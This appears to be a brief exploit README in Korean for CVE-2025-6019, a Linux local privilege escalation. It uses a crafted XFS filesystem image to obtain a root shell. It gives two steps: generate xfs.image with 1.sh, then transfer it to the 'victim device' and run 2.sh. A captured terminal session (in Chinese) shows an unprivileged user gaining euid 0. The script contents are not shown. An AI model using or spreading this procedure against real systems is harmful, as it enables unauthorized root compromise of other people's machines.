
CVE-2025-6019에 대한 로컬 권한 상승 익스플로잇으로, 조작된 XFS 파일시스템 이미지를 사용하여 Linux 시스템에서 루트 셸 접근 권한을 획득합니다.
1단계: Linux 장치에서 1.sh를 실행하여 xfs.image를 생성합니다.
2단계: xfs.image를 피해 장치로 전송하고 2.sh를 실행합니다. 아래와 같이 성공하면 됩니다.
neko@aosc-neko205 [ tmp ] $ bash 2.sh
当前用户: neko
uid=1000(neko) gid=1001(neko) 组=1001(neko),11(audio),12(video),15(cdrom),974(ollama),997(wheel),999(plugdev),1002(gamemode)
('yes',)
Mapped file /home/neko/xfs.image as /dev/loop0.
成功找到 Root Shell: /tmp/blockdev.IK6D92/root-shell
正在提权...
root-shell-5.2# id
uid=1000(neko) gid=1001(neko) euid=0(root) 组=1001(neko),11(audio),12(video),15(cdrom),974(ollama),997(wheel),999(plugdev),1002(gamemode)
root-shell-5.2#